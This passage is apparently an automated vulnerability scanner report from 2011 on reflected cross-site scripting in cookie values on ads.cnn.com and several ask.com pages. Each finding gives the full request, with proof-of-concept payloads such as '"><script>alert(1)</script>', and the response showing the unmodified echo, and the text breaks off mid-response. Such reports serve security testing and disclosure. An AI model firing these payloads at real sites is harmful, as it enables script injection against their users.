Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-16f78e"><script>alert(1)</script>4fc306aade2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:55 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:55 GMT
Pragma: no-cache
Content-Length: 3626
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,60072,60074,60077,60093,60443,61263,61421,61887,61908,61913,63267,116196,116269,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16f78e"><script>alert(1)</script>4fc306aade2%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.109. http://www.ask.com/about/help [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f9f"-alert(1)-"166177881c7 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/help HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=095f9f"-alert(1)-"166177881c7; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnVQpcQKQAAAOoL3gAAADh
from-tr: trafrt012iad.io.askjeeves.info
Cache-Control: private
Content-Length: 48901
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:09 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Help Center</title>


<link href="http://
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c407e&ip=32177b6a&id=092B253AE6639F9442E96758F819E080&q=&p=0&qs=121&ac=24&g=6f992AY+nqUEm9&cu.wz=095f9f"-alert(1)-"166177881c7";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c407e&ip=32177b6a&id=092B253AE6639F9442E96758F819E080&q=&p=0&qs=121&ac=24&g=6f992AY+nqUEm9&cu.wz=095
...[SNIP]...

1.110. http://www.ask.com/about/help/webmasters [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help/webmasters

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133a3"-alert(1)-"b0442117721 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/help/webmasters HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0133a3"-alert(1)-"b0442117721; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnYApcQW8AAHONnLMAAAED
from-tr: trafrt001iad.io.askjeeves.info
Content-Length: 48900
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Webmasters</title>


<link href="http://w
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4071&ip=32177b6a&id=B02E64EAD53183EC52340B52FB48903D&q=&p=0&qs=121&ac=24&g=025csZepI60Lr7&cu.wz=0133a3"-alert(1)-"b0442117721";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4071&ip=32177b6a&id=B02E64EAD53183EC52340B52FB48903D&q=&p=0&qs=121&ac=24&g=025csZepI60Lr7&cu.wz=013
...[SNIP]...

1.111. http://www.ask.com/about/legal/ask-site-policies [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/ask-site-policies

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34dea"-alert(1)-"8e07e4958b0 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/legal/ask-site-policies HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=034dea"-alert(1)-"8e07e4958b0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjMyLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnVApcQDoAAAsB@9gAAAKs
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 49685
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:08 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:08 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Ask Site Policies</title>


<link href="h
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4070&ip=32177b6a&id=D40C80CDE7C508A2C105A9CAE2332676&q=&p=0&qs=121&ac=24&g=193fGoyHOi6rbq&cu.wz=034dea"-alert(1)-"8e07e4958b0";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c4070&ip=32177b6a&id=D40C80CDE7C508A2C105A9CAE2332676&q=&p=0&qs=121&ac=24&g=193fGoyHOi6rbq&cu.wz=034
...[SNIP]...

1.112. http://www.ask.com/about/legal/privacy [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1f2"-alert(1)-"7a4166739ea was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bb1f2"-alert(1)-"7a4166739ea; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSQpcQXIAABTifJYAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 46496
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:25 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:25 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb1f2"-alert(1)-"7a4166739ea";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb
...[SNIP]...

1.113. http://www.ask.com/news [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392a7"><script>alert(1)</script>c62fd19743e was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0392a7"><script>alert(1)</script>c62fd19743e; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQKMAAFY@qwcAAAEP
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 77591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c4050&p=news&rf=0&ord=3589925&cu.wz=0392a7"><script>alert(1)</script>c62fd19743e" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.114. http://www.ask.com/news [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd43e"-alert(1)-"a9f401dd648 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bd43e"-alert(1)-"a9f401dd648; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDoAAAxvxc8AAAML
from-tr: trafrt010iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77443
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c404d&p=news&rf=0&ord=3754410&cu.wz=0bd43e"-alert(1)-"a9f401dd648";


</script>
...[SNIP]...

1.115. http://www.ask.com/pictures [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9561"><script>alert(1)</script>e8deaf81c4c was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0b9561"><script>alert(1)</script>e8deaf81c4c; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
